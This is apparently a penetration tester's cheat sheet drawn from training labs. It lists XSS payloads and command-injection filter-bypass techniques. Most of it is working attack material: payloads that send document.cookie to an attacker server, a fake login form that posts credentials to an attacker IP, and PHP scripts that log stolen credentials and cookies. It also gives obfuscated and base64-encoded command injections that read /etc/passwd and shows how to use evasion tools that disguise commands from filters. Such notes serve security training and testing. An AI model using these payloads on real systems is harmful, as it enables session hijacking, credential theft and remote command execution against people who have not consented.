# Basic XSS payload to print something
<script>print()</script>
# steal document cookie
<script>alert(document.cookie)</script>
#Change background color
<script>document.body.style.background = "#141d2b"</script>
#Change Background Image
<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>
# Change Website title
<script>document.title = 'XSS Title'</script>
# Overwrite website's main body
<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>
# Remove an HTML element
<script>document.getElementById('urlform').remove();</script>
# Load a script from our server
<script src="http://OUR_IP/script.js"></script>
# Send cookies to our server
<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>
# Website Defacing: Change the Title and an external image on the entire website via Body using inner HTML
<script>document.getElementsByTagName('body')[0].innerHTML = '<center><h1 style="color: white">Cyber Security Training</h1><p style="color: white">by <img src="https://academy.hackthebox.com/images/logo-htb.svg" height="25px" alt="HTB Academy"> </p></center>'</script>
#Try closing first the code and inject your script
'><script>alert(1)</script>
#Load a remote script
<script src=http://OUR_IP/fullname.js></script>
#If we don t know which field is vulnerable, we can try blind XSS and see if we get some request from our webserver
<script src=http://OUR_IP/fullname></script> #this goes inside the full-name field
<script src=http://OUR_IP/username></script> #this goes inside the username field
XSS for a phishing attack simulation
#Example of a XSS with Login form that sends the results to your webserver, this will replace the entire body by the HTML code below
#Change the IP/PORT to your server
XSS='><script>document.getElementsByTagName('body')[0].innerHTML = '<h3>Please login to continue</h3><form action=http://10.10.14.125:4444><input type="username"name="username"placeholder="Username"><input type="password"name="password"placeholder="Password"><input type="submit" name="submit" value="Login"></form>'</script>
'><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.14.125:4444><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');</script>
Results:
To return the victim's to the original page and reduce suspicions, we can host a PHP page on our webserver.
PHP Example code that we can place under /tmp/tmpserver/
and call it index.php
(Don't forget to change the Server_IP to the website or IP that you are testing)
<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
$file = fopen("creds.txt", "a+");
fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
header("Location: http://SERVER_IP/phishing/index.php");
fclose($file);
exit();
}
?>
Reflected XSS
into attribute with angle brackets HTML-encoded
Especially if the angels are HTML encoded and being escaped
'" autofocus onfocus=alert(1) x="''
" onmouseover"=alert(2)
Reflected XSS into a JavaScript string with angle brackets HTML encoded
//Consider the following javascript
<script>
var searchTerms = ''+alert(1)+'';
document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>
//We break the script by closing the brackets and sending alert(1) payload
'+alert(1)+'
Stored XSS into anchor href
attribute with double quotes HTML-encoded
href
attribute with double quotes HTML-encoded<a id="author" href="javascript:alert();">Controllable Attacker Input</a>
javascript:alert();
XSS for session hijacking
If we identify XSS, we can use it to steal user's cookies with the following example approach.
Host a PHP script on your webserver that would capture a parameter and save it's content to a file
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>
Inject one of the following payloads to steal the user's cookies through XSS
<script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script>
If the XSS is successfull, we would get the user's cookies from the cookie.txt file
cat cookies.txt
Victim IP: 10.10.10.1 | Cookie: cookie=f904f93c949d19d870911bf8b05fe7b2
Javascript cookie grabber
document.location='http://OUR_IP/index.php?c='+document.cookie;
<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie;</script>
DOM XSS
While reflected XSS
sends the input data to the back-end server through HTTP requests, DOM XSS is completely processed on the client-side through JavaScript. DOM XSS occurs when JavaScript is used to change the page source through the Document Object Model (DOM)
. If the parameter starts with "#" like in this example http://SERVER_IP:PORT/
#task
=<img src=
it means that the parameter is executed by the Javascript through DOM
//DOM-Based XSS
<img src="" onerror=alert(window.origin)>
<img src="" onerror=alert(document.cookie)>
#"><img src=/ onerror=alert(2)>
// DOM XSS in jQuery selector sink using a hashchange event
<iframe src ="https://0a86004c037f1eee82a9063700e500af.web-security-academy.net/#" onload="this.src+='<img src=1 onerror=print()>'"</iframe>
JQuery vulnerable code - DOM XSS
<script>
$(window).on('hashchange', function(){
var post = $('section.blog-list h2:contains(' + decodeURIComponent(window.location.hash.slice(1)) + ')');
if (post) post.get(0).scrollIntoView();
});
</script>
Executing stuff inside the href attribute
//Executing stuff inside href attribute
javascript:alert(1)
XSStrike
XSSSTRIKE is a powerful python tool that allows you to automate the detection of XSS vulnerabilities on parameters:
git clone https://github.com/s0md3v/XSStrike.git
cd XSStrike
pip install -r requirements.txt
python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"
If you get an error from python when you try to install the requirements, you might need to create a virtual environment : which allow you to manage Python packages independently of the system Python.
sudo apt install python3-venv
python3 -m venv xsstrike-env
source xsstrike-env/bin/activate
pip install -r requirements.txt
Other useful resources with interesting XSS payloads:
Command injections
Injection Operators
Semicolon
;
%3b
Both
New Line
\n
%0a
Both
Background
&
%26
Both (second output generally shown first)
Pipe
|
%7c
Both (second output is shown)
AND
&&
%26%26
Both (only if first succeeds)
OR
||
%7c%7c
Second (only if first fails)
Sub-Shell
``
%60%60
Both (Linux-only)
Sub-Shell
$()
%24%28%29
Both (Linux-only)
Linux
Filtered Character Bypass
# Can be used to view all environment variables
printenv
# Using tabs instead of spaces
%09
# Example, using tabs for spaces and URL encoded %0a for new line
ip=127.0.0.1%0a%09ls%09-la
# Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())
${IFS}
# spaces in between are automatically placed with (IFS):
127.0.0.1%0a${IFS}ls${IFS}-la
# Commas will be replaced with spaces
{ls,-la}
# Will be replaced with /
${PATH:0:1}
# Will be replaced with ;
${LS_COLORS:10:1}
# Shift character by one ([ -> \)
$(tr '!-}' '"-~'<<<[)
Blacklisted Command Bypass
# Total must be even
' or "
# Linux only
$@ or \
# Execute command regardless of cases, replaces all upper-cases with lower case characters
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
# Another variation of the technique
$(a="WhOaMi";printf %s "${a,,}")
# Reverse a string
echo 'whoami' | rev
# Execute reversed command
$(rev<<<'imaohw')
# Encode a string with base64
echo -n 'cat /etc/passwd | grep 33' | base64
# Execute b64 encoded string, using <<< to avoid using a pipe | if filtered by the waf
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
Windows
Filtered Character Bypass
# Can be used to view all environment variables - (PowerShell)
Get-ChildItem Env:
# Using tabs instead of spaces
# %09
# Will be replaced with a space - (CMD)
%PROGRAMFILES:~10,-5%
# Will be replaced with a space - (PowerShell)
$env:PROGRAMFILES[10]
Other Characters
# Will be replaced with \ - (CMD)
%HOMEPATH:~0,-17%
# Will be replaced with \ - (PowerShell)
$env:HOMEPATH[0]
Blacklisted Command Bypass
# Total must be even
' or "
# Windows only (CMD)
^
# Simply send the character with odd cases
WhoAmi
# Reverse a string
"whoami"[-1..-20] -join ''
# Execute reversed command
iex "$('imaohw'[-1..-20] -join '')"
# Encode a string with base64
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))
# Execute b64 encoded string
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
Evasion Tools (Bash commands Obfuscators)
Linux
Bashfuscator: Once we have the tool set up, we can start using it from the
./bashfuscator/bin/
directory. There are many flags we can use with the tool to fine-tune our final obfuscated command, as we can see in the-h
help menu.
git clone https://github.com/Bashfuscator/Bashfuscator
cd Bashfuscator
pip3 install setuptools==65
python3 setup.py install --user
# Usage examples
./bashfuscator -c 'cat /etc/passwd'
./bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1
[+] Mutators used: Token/ForCode
[+] Payload:
eval "$(W0=(w \ t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"
[+] Payload size: 104 characters
#Test the payload with bash -c ...
bash -c 'eval "$(W0=(w \ t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"'
root:x:0:0:root:/root:/bin/bash
...SNIP...
Windows
DOSfuscation: There is also a very similar tool that we can use for Windows called DOSfuscation. Unlike
Bashfuscator
, this is an interactive tool, as we run it once and interact with it to get the desired obfuscated command. We can once again clone the tool from GitHub and then invoke it through PowerShell, as follows:
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
Invoke-DOSfuscation> help
HELP MENU :: Available options shown below:
[*] Tutorial of how to use this tool TUTORIAL
...SNIP...
Choose one of the below options:
[*] BINARY Obfuscated binary syntax for cmd.exe & powershell.exe
[*] ENCODING Environment variable encoding
[*] PAYLOAD Obfuscated payload via DOSfuscation
# Usage example
SET COMMAND type C:\Users\htb-student\Desktop\flag.txt
encoding
1
...SNIP...
Result:
typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt
Resources
Last updated